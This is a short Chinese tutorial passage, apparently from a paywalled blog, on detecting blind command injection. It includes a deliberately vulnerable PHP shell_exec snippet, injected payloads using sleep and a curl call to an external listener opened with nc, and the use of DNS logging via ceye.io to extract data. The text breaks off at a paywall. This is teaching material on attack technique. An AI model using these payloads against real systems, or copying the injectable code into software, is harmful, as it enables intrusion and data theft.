本文探讨了在命令无回显的情况下如何进行判断,包括延时方法、HTTP请求和DNS请求的利用。重点讲解了DNS请求在安全检测中的应用,如通过ceye.io平台记录DNS请求。同时,提供了两种利用ping命令执行和数据提取的思路,但遇到特殊字符时可能引发错误。
命令无回显的情况
判断方法
1.延时
2.HTTP请求
3.DNS请求
<?php
highlight_file(__FILE__);
shell_exec($_GET[1]);
?>(1)通过传入1=ls|sleep(3)
页面加载3秒左右才显示来证明注入语句带入成功
传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000
(2)通过提前nc监听,利用curl命令进行信息获取
(3)提前注册ceye.io平台获取一个域名,该域名下的子域名被请求的信息都会被记录到平台上
其中DNS请求的使用范围多于HTTP请求,常用利用方式
写shell(直接写入/外部下载)http/dns等方式带出数据
<?php
highlight_file(__FILE__);
include('where_is_flag.php');
echo "ping";
$ip = (string)$_GET['ping'];
$ip = str_replace(">","0.0",$ip)
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
